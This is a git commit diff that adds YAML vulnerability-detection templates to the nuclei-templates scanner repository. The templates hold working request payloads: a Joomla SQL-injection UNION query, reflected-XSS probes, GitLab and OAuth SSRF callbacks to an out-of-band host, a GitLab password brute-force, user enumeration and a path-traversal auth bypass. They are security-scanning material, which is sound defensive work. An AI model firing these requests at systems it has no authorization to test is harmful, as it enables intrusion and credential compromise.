Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates
commit
bb6fa66dd9
10
README.md
10
README.md
|
@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||
| cves | 344 | vulnerabilities | 183 | exposed-panels | 150 |
|
||||
| takeovers | 67 | exposures | 107 | technologies | 103 |
|
||||
| misconfiguration | 68 | workflows | 32 | miscellaneous | 24 |
|
||||
| default-logins | 30 | file | 42 | dns | 10 |
|
||||
| cves | 349 | vulnerabilities | 184 | exposed-panels | 150 |
|
||||
| takeovers | 67 | exposures | 107 | technologies | 105 |
|
||||
| misconfiguration | 70 | workflows | 32 | miscellaneous | 24 |
|
||||
| default-logins | 31 | file | 42 | dns | 10 |
|
||||
| fuzzing | 10 | helpers | 9 | iot | 13 |
|
||||
|
||||
**118 directories, 1298 files**.
|
||||
**119 directories, 1311 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2017-15944
|
||||
|
||||
info:
|
||||
name: PreAuth RCE on Palo Alto GlobalProtect
|
||||
author: emadshanab
|
||||
reference: http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
|
||||
severity: high
|
||||
tags: cve,cve2017,rce,vpn,paloalto
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/global-protect/portal/css/login.css"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2018-17254
|
||||
|
||||
info:
|
||||
name: Joomla JCK Editor SQL Injection
|
||||
author: Suman_Kar
|
||||
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
|
||||
severity: high
|
||||
tags: joomla,sqli,cve,cve2018
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
|
||||
Referer: {{BaseURL}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "nuclei-template"
|
|
@ -11,9 +11,10 @@ requests:
|
|||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin.php"
|
||||
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'
|
||||
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>'
|
||||
redirects: true
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")'
|
||||
- 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\"><script>alert(0);</script>")'
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2020-25495
|
||||
|
||||
info:
|
||||
name: SCO Openserver 5.0.7 - 'section' Reflected XSS
|
||||
author: 0x_Akoko
|
||||
description: A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'.
|
||||
severity: medium
|
||||
tags: cve,cve2020,sco,xss
|
||||
reference: https://www.exploit-db.com/exploits/49300
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<h1>hello</h1><script>alert(/{{randstr}}/)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: luci
|
||||
severity: critical
|
||||
description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983.
|
||||
tags: cve,cve2021,ssrf,vmware
|
||||
tags: cve,cve2021,ssrf,vmware,vrealize
|
||||
reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2021-22214
|
||||
|
||||
info:
|
||||
author: Suman_Kar
|
||||
name: Unauthenticated Gitlab SSRF - CI Lint API
|
||||
severity: medium
|
||||
description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
|
||||
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
|
||||
- https://docs.gitlab.com/ee/api/lint.html
|
||||
tags: cve,cve2021,gitlab,ssrf,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
|
||||
Referer: {{BaseURL}}
|
||||
content-type: application/json
|
||||
Connection: close
|
||||
|
||||
{"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
words:
|
||||
- "dns"
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2021-28854
|
||||
|
||||
info:
|
||||
name: VICIdial - Multiple sensitive Information disclosure
|
||||
author: pdteam
|
||||
severity: high
|
||||
description: VICIdial's Web Client contains many sensitive files that can be access from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/21
|
||||
reference: https://github.com/JHHAX/VICIdial
|
||||
tags: cve,cve2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/agc/vicidial_mysqli_errors.txt"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'text/plain'
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'vdc_db_query'
|
||||
part: body
|
|
@ -0,0 +1,55 @@
|
|||
id: gitlab-weak-login
|
||||
info:
|
||||
name: Gitlab Weak Login
|
||||
author: Suman_Kar
|
||||
severity: high
|
||||
tags: gitlab,default-login
|
||||
|
||||
# Gitlab blocks for 10 minutes after 5 "Invalid" attempts for valid user.
|
||||
# So make sure, not to attempt more than 4 password for same valid user.
|
||||
|
||||
requests:
|
||||
|
||||
- payloads:
|
||||
|
||||
gitlab_password:
|
||||
- 12345
|
||||
- 123456789
|
||||
gitlab_user:
|
||||
- 1234
|
||||
- admin
|
||||
# Enumerate valid user.
|
||||
|
||||
attack: clusterbomb
|
||||
|
||||
raw:
|
||||
- |
|
||||
POST /oauth/token HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
|
||||
Accept: application/json, text/plain, */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Referer: {{BaseURL}}
|
||||
content-type: application/json
|
||||
Connection: close
|
||||
|
||||
{"grant_type":"password","username":"§gitlab_user§","password":"§gitlab_password§"}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- application/json
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"access_token":'
|
||||
- '"token_type":'
|
||||
- '"refresh_token":'
|
||||
condition: and
|
|
@ -15,3 +15,9 @@ requests:
|
|||
words:
|
||||
- "<title>Grafana</title>"
|
||||
part: body
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- 'Grafana ([v0-9.]+)'
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
id: extract-urls
|
||||
|
||||
info:
|
||||
name: Extract URLs from HTML attributes
|
||||
author: dwisiswant0
|
||||
severity: info
|
||||
tags: headless,extractor
|
||||
|
||||
headless:
|
||||
- steps:
|
||||
- args:
|
||||
url: "{{BaseURL}}"
|
||||
action: navigate
|
||||
- action: waitload
|
||||
- action: script
|
||||
name: extract
|
||||
args:
|
||||
code: |
|
||||
'\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n'
|
||||
extractors:
|
||||
- type: kval
|
||||
part: extract
|
||||
kval:
|
||||
- extract
|
|
@ -30,3 +30,4 @@ requests:
|
|||
words:
|
||||
- '"success":true'
|
||||
- 'rep:password'
|
||||
condition: and
|
|
@ -28,4 +28,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- '"success":true'
|
||||
- 'jcr:uuid'
|
||||
- 'jcr:uuid'
|
||||
condition: and
|
|
@ -0,0 +1,35 @@
|
|||
id: ssrf-via-oauth-misconfig
|
||||
|
||||
info:
|
||||
name: SSRF due to misconfiguration in OAuth
|
||||
author: KabirSuda
|
||||
severity: medium
|
||||
description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
|
||||
tags: misconfig,oob,oauth
|
||||
reference: https://portswigger.net/research/hidden-oauth-attack-vectors
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /connect/register HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
{
|
||||
"application_type": "web",
|
||||
"redirect_uris": ["https://{{interactsh-url}}/callback"],
|
||||
"client_name": "{{Hostname}}",
|
||||
"logo_uri": "https://{{interactsh-url}}/favicon.ico",
|
||||
"subject_type": "pairwise",
|
||||
"token_endpoint_auth_method": "client_secret_basic",
|
||||
"request_uris": ["https://{{interactsh-url}}"]
|
||||
}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
words:
|
||||
- "dns"
|
|
@ -0,0 +1,31 @@
|
|||
id: zhiyuan-oa-unauthorized
|
||||
|
||||
info:
|
||||
name: Zhiyuan Oa Unauthorized
|
||||
author: pikpikcu
|
||||
severity: low
|
||||
reference: https://buaq.net/go-53721.html
|
||||
tags: seeyon,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "serverIdentifier"
|
||||
- "companyName"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,145 @@
|
|||
id: openssh-username-enumeration
|
||||
|
||||
info:
|
||||
name: OpenSSH 2.3 < 7.7 Detection
|
||||
author: r3dg33k
|
||||
severity: medium
|
||||
tags: network,openssh
|
||||
description: OpenSSH 2.3 < 7.7 is vulnerable to username enumeration
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
|
||||
|
||||
network:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Hostname}}:22"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "SSH-2.0-OpenSSH_7.6"
|
||||
- "SSH-2.0-OpenSSH_7.6p1"
|
||||
- "SSH-2.0-OpenSSH_7.5"
|
||||
- "SSH-2.0-OpenSSH_7.5p1"
|
||||
- "SSH-2.0-OpenSSH_7.4"
|
||||
- "SSH-2.0-OpenSSH_7.4p1"
|
||||
- "SSH-2.0-OpenSSH_7.3"
|
||||
- "SSH-2.0-OpenSSH_7.3p1"
|
||||
- "SSH-2.0-OpenSSH_7.2p2"
|
||||
- "SSH-2.0-OpenSSH_7.2"
|
||||
- "SSH-2.0-OpenSSH_7.2p1"
|
||||
- "SSH-2.0-OpenSSH_7.1p2"
|
||||
- "SSH-2.0-OpenSSH_7.1"
|
||||
- "SSH-2.0-OpenSSH_7.1p1"
|
||||
- "SSH-2.0-OpenSSH_7.0"
|
||||
- "SSH-2.0-OpenSSH_7.0p1"
|
||||
- "SSH-2.0-OpenSSH_6.9"
|
||||
- "SSH-2.0-OpenSSH_6.9p1"
|
||||
- "SSH-2.0-OpenSSH_6.8"
|
||||
- "SSH-2.0-OpenSSH_6.8p1"
|
||||
- "SSH-2.0-OpenSSH_6.7"
|
||||
- "SSH-2.0-OpenSSH_6.7p1"
|
||||
- "SSH-2.0-OpenSSH_6.6"
|
||||
- "SSH-2.0-OpenSSH_6.6p1"
|
||||
- "SSH-2.0-OpenSSH_6.5"
|
||||
- "SSH-2.0-OpenSSH_6.5p1"
|
||||
- "SSH-2.0-OpenSSH_6.4"
|
||||
- "SSH-2.0-OpenSSH_6.4p1"
|
||||
- "SSH-2.0-OpenSSH_6.3"
|
||||
- "SSH-2.0-OpenSSH_6.3p1"
|
||||
- "SSH-2.0-OpenSSH_6.2p2"
|
||||
- "SSH-2.0-OpenSSH_6.2"
|
||||
- "SSH-2.0-OpenSSH_6.2p1"
|
||||
- "SSH-2.0-OpenSSH_6.1"
|
||||
- "SSH-2.0-OpenSSH_6.1p1"
|
||||
- "SSH-2.0-OpenSSH_6.0"
|
||||
- "SSH-2.0-OpenSSH_6.0p1"
|
||||
- "SSH-2.0-OpenSSH_5.9"
|
||||
- "SSH-2.0-OpenSSH_5.9p1"
|
||||
- "SSH-2.0-OpenSSH_5.8p2"
|
||||
- "SSH-2.0-OpenSSH_5.8"
|
||||
- "SSH-2.0-OpenSSH_5.8p1"
|
||||
- "SSH-2.0-OpenSSH_5.7"
|
||||
- "SSH-2.0-OpenSSH_5.7p1"
|
||||
- "SSH-2.0-OpenSSH_5.6"
|
||||
- "SSH-2.0-OpenSSH_5.6p1"
|
||||
- "SSH-2.0-OpenSSH_5.5"
|
||||
- "SSH-2.0-OpenSSH_5.5p1"
|
||||
- "SSH-2.0-OpenSSH_5.4"
|
||||
- "SSH-2.0-OpenSSH_5.4p1"
|
||||
- "SSH-2.0-OpenSSH_5.3"
|
||||
- "SSH-2.0-OpenSSH_5.3p1"
|
||||
- "SSH-2.0-OpenSSH_5.2"
|
||||
- "SSH-2.0-OpenSSH_5.2p1"
|
||||
- "SSH-2.0-OpenSSH_5.1"
|
||||
- "SSH-2.0-OpenSSH_5.1p1"
|
||||
- "SSH-2.0-OpenSSH_5.0"
|
||||
- "SSH-2.0-OpenSSH_5.0p1"
|
||||
- "SSH-2.0-OpenSSH_4.9"
|
||||
- "SSH-2.0-OpenSSH_4.9p1"
|
||||
- "SSH-2.0-OpenSSH_4.8"
|
||||
- "SSH-2.0-OpenSSH_4.8p1"
|
||||
- "SSH-2.0-OpenSSH_4.6"
|
||||
- "SSH-2.0-OpenSSH_4.6p1"
|
||||
- "SSH-2.0-OpenSSH_4.7"
|
||||
- "SSH-2.0-OpenSSH_4.7p1"
|
||||
- "SSH-2.0-OpenSSH_4.5"
|
||||
- "SSH-2.0-OpenSSH_4.5p1"
|
||||
- "SSH-2.0-OpenSSH_4.4"
|
||||
- "SSH-2.0-OpenSSH_4.4p1"
|
||||
- "SSH-2.0-OpenSSH_4.3p2"
|
||||
- "SSH-2.0-OpenSSH_4.3"
|
||||
- "SSH-2.0-OpenSSH_4.3p1"
|
||||
- "SSH-2.0-OpenSSH_4.2"
|
||||
- "SSH-2.0-OpenSSH_4.2p1"
|
||||
- "SSH-2.0-OpenSSH_4.1"
|
||||
- "SSH-2.0-OpenSSH_4.1p1"
|
||||
- "SSH-2.0-OpenSSH_4.0"
|
||||
- "SSH-2.0-OpenSSH_4.0p1"
|
||||
- "SSH-2.0-OpenSSH_3.9"
|
||||
- "SSH-2.0-OpenSSH_3.9p1"
|
||||
- "SSH-2.0-OpenSSH_3.8.1p1"
|
||||
- "SSH-2.0-OpenSSH_3.8"
|
||||
- "SSH-2.0-OpenSSH_3.8p1"
|
||||
- "SSH-2.0-OpenSSH_3.7.1p2"
|
||||
- "SSH-2.0-OpenSSH_3.7.1"
|
||||
- "SSH-2.0-OpenSSH_3.7.1p1"
|
||||
- "SSH-2.0-OpenSSH_3.7"
|
||||
- "SSH-2.0-OpenSSH_3.7p1"
|
||||
- "SSH-2.0-OpenSSH_3.6.1p2"
|
||||
- "SSH-2.0-OpenSSH_3.6.1"
|
||||
- "SSH-2.0-OpenSSH_3.6.1p1"
|
||||
- "SSH-2.0-OpenSSH_3.6"
|
||||
- "SSH-2.0-OpenSSH_3.6p1"
|
||||
- "SSH-2.0-OpenSSH_3.5"
|
||||
- "SSH-2.0-OpenSSH_3.5p1"
|
||||
- "SSH-2.0-OpenSSH_3.4"
|
||||
- "SSH-2.0-OpenSSH_3.4p1"
|
||||
- "SSH-2.0-OpenSSH_3.3"
|
||||
- "SSH-2.0-OpenSSH_3.3p1"
|
||||
- "SSH-2.0-OpenSSH_3.2.3"
|
||||
- "SSH-2.0-OpenSSH_3.2.3p1"
|
||||
- "SSH-2.0-OpenSSH_3.2.2"
|
||||
- "SSH-2.0-OpenSSH_3.2.2p1"
|
||||
- "SSH-2.0-OpenSSH_3.1"
|
||||
- "SSH-2.0-OpenSSH_3.1p1"
|
||||
- "SSH-2.0-OpenSSH_3.0.2"
|
||||
- "SSH-2.0-OpenSSH_3.0.2p1"
|
||||
- "SSH-2.0-OpenSSH_3.0p1"
|
||||
- "SSH-2.0-OpenSSH_3.0.1"
|
||||
- "SSH-2.0-OpenSSH_3.0.1p1"
|
||||
- "SSH-2.0-OpenSSH_3.0"
|
||||
- "SSH-2.0-OpenSSH_3.0p1"
|
||||
- "SSH-2.0-OpenSSH_2.9p2"
|
||||
- "SSH-2.0-OpenSSH_2.9.9"
|
||||
- "SSH-2.0-OpenSSH_2.9.9p1"
|
||||
- "SSH-2.0-OpenSSH_2.9"
|
||||
- "SSH-2.0-OpenSSH_2.9p1"
|
||||
- "SSH-2.0-OpenSSH_2.5.2p2"
|
||||
- "SSH-2.0-OpenSSH_2.5.1p2"
|
||||
- "SSH-2.0-OpenSSH_2.5.1p1"
|
||||
- "SSH-2.0-OpenSSH_2.3.0p1"
|
||||
- "SSH-2.0-OpenSSH_2.5.2p2"
|
||||
- "SSH-2.0-OpenSSH_2.5.1p2"
|
||||
- "SSH-2.0-OpenSSH_2.5.1p1"
|
||||
- "SSH-2.0-OpenSSH_2.3.0p1"
|
||||
- "SSH-2.0-OpenSSH_2.3"
|
|
@ -0,0 +1,21 @@
|
|||
id: detect-sentry
|
||||
|
||||
info:
|
||||
name: Detect Sentry Instance
|
||||
author: Sicksec
|
||||
severity: info
|
||||
tags: ssrf,sentry,tech
|
||||
reference: |
|
||||
- https://hackerone.com/reports/374737
|
||||
- https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "https://[0-9a-f]*@[a-z0-9]+\\.[a-z.]+.?[0-9]+"
|
|
@ -0,0 +1,36 @@
|
|||
id: vmware-vrealize
|
||||
|
||||
info:
|
||||
name: VMware vRealize
|
||||
author: milo2012
|
||||
severity: info
|
||||
description: Version of VMware vRealize Operations Manager
|
||||
tags: vmware,vrealize
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ui/login.action"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- text/html
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<title>vRealize Operations Manager</title>'
|
||||
part: body
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- "SessionProvider.js\\?version=([0-9.]+)"
|
|
@ -0,0 +1,42 @@
|
|||
id: gitlab-user-open-api
|
||||
|
||||
info:
|
||||
author: Suman_Kar
|
||||
name: GitLab - User Information Disclosure Via Open API
|
||||
severity: medium
|
||||
tags: gitlab,disclosure,fuzz
|
||||
reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
uid: helpers/wordlists/numbers.txt
|
||||
attack: sniper
|
||||
threads: 50
|
||||
|
||||
raw:
|
||||
- |
|
||||
GET /api/v4/users/{{uid}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Accept: application/json, text/plain, */*
|
||||
Referer: {{BaseURL}}
|
||||
Connection: keep-alive
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "username.*"
|
||||
- "id.*"
|
||||
- "name.*"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -10,4 +10,8 @@ workflows:
|
|||
|
||||
- template: exposed-panels/gitlab-detect.yaml
|
||||
subtemplates:
|
||||
- template: misconfiguration/gitlab/
|
||||
- template: misconfiguration/gitlab/
|
||||
- template: vulnerabilities/gitlab/
|
||||
- template: cves/2020/CVE-2020-2096.yaml
|
||||
- template: cves/2021/CVE-2021-22214.yaml
|
||||
- template: default-logins/gitlab/gitlab-weak-login.yaml
|
Loading…
Reference in New Issue